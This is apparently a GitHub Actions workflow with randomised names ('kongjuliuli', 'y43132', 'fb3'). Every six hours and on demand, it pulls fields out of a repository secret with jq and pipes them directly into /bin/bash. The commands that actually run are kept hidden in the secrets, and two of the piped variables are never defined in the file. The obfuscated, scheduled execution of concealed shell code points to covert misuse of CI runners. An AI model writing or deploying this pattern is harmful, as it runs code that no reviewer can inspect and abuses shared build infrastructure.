name: kongjuliuli

on:
  workflow_dispatch:
  schedule:
    - cron: '21 3/6 * * *'
jobs:  # 22527
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kongjuliuli
        env:
          y43132: ${{ secrets.y43132 }}
        run: |
          echo $y43132 | jq -r .fb3 | /bin/bash
          echo $webr5323 | jq -r .ocgud347 | /bin/bash
          echo $qr7 | jq -r .e59 | /bin/bash

